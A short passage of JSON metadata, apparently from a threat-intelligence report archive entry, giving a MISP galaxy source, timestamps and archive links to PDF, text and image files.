			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434202,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bbc6fbc3c573715027731175ee6e287858152737.pdf",
		"text": "https://archive.orkl.eu/bbc6fbc3c573715027731175ee6e287858152737.txt",
		"img": "https://archive.orkl.eu/bbc6fbc3c573715027731175ee6e287858152737.jpg"
	}
}